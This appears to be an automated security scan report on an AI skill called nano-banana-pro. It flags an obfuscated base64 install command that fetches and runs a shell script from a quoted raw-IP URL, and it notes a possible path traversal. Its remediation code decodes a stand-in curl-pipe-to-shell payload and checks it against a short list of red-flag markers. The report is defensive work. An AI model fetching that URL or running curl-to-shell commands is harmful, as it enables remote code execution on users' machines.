Trust Assessment
nano-banana-pro received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 0 high, 1 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell", "Obfuscated Remote Code Execution during MacOS Installation", and "Potential Path Traversal via Unsanitized File Path Arguments".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 63/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Obfuscated execution: base64 decode to shell.** Detected base64-encoded data being decoded and piped to a shell interpreter, a common obfuscation technique. Remediation: decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/nano-banana-pro-srlqfn/SKILL.md:10 |
| CRITICAL | **Obfuscated Remote Code Execution during MacOS Installation.** The MacOS installation instructions include a base64-encoded command that, when decoded, downloads and executes a shell script from an arbitrary IP address (`http://91.92.242.30/tjjve9itarrd3txw`). This allows arbitrary code execution on the user's system without explicit review, posing a severe supply chain risk and a direct command injection vulnerability; the base64 encoding also constitutes hidden instructions. Remediation: remove the obfuscated remote code execution command; provide clear, auditable installation instructions, preferably via a package manager or a script hosted on a trusted, version-controlled platform; and ensure all external script sources use HTTPS. | LLM | SKILL.md:13 |
| MEDIUM | **Potential Path Traversal via Unsanitized File Path Arguments.** The skill's usage examples pass user-provided values for `--filename` and `--input-image` directly to the `generate_image.py` script, and the documentation explicitly states that `--filename` can include directory components. If the script does not sanitize these arguments against path traversal sequences (e.g., `../`), a malicious user could specify paths outside the intended working directory, enabling arbitrary file writes (via `--filename`) or arbitrary file reads (via `--input-image`) that could exfiltrate sensitive data or overwrite critical system files. Remediation: `generate_image.py` must validate and sanitize all file path arguments, resolving them to ensure they remain within an allowed, sandboxed directory, or at minimum normalizing paths to prevent traversal attacks. | LLM | SKILL.md:23 |
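The remediation for the base64 findings is to decode and review the payload rather than piping it to a shell. A minimal sketch of that workflow, using a hypothetical stand-in payload (not the actual command found in the skill):

```python
import base64

# Hypothetical payload standing in for the skill's encoded command.
payload = "curl -s http://example.invalid/script.sh | sh"
encoded = base64.b64encode(payload.encode()).decode()

# Safe handling: decode to text and inspect it; never pipe it to `sh` unseen.
decoded = base64.b64decode(encoded).decode("utf-8", errors="replace")
print(decoded)

# Simple red flags worth scanning for before running anything.
markers = ("| sh", "| bash", "curl ", "wget ")
suspicious = any(m in decoded for m in markers)
assert suspicious  # this payload downloads a script and pipes it to a shell
```

The marker list is illustrative; a real reviewer would read the full decoded command, not just pattern-match it.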
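The path-traversal remediation (resolve every user-supplied path and confirm it stays inside a sandbox directory) can be sketched as follows. `resolve_inside` is a hypothetical helper, since `generate_image.py`'s actual argument handling is not shown in this report:

```python
from pathlib import Path

def resolve_inside(base_dir: str, user_path: str) -> Path:
    """Resolve user_path and reject anything that escapes base_dir."""
    base = Path(base_dir).resolve()
    candidate = (base / user_path).resolve()
    if not candidate.is_relative_to(base):  # Python 3.9+
        raise ValueError(f"path escapes sandbox: {user_path!r}")
    return candidate

# A filename with nested directory components resolves inside the sandbox...
print(resolve_inside("/tmp/out", "images/pic.png"))

# ...but traversal sequences out of the sandbox are rejected.
try:
    resolve_inside("/tmp/out", "../../etc/passwd")
except ValueError as exc:
    print(exc)
```

Note that joining an absolute `user_path` (e.g. `/etc/passwd`) also fails the check, because `pathlib` replaces the base when the right-hand operand is absolute, and the resolved result falls outside `base`.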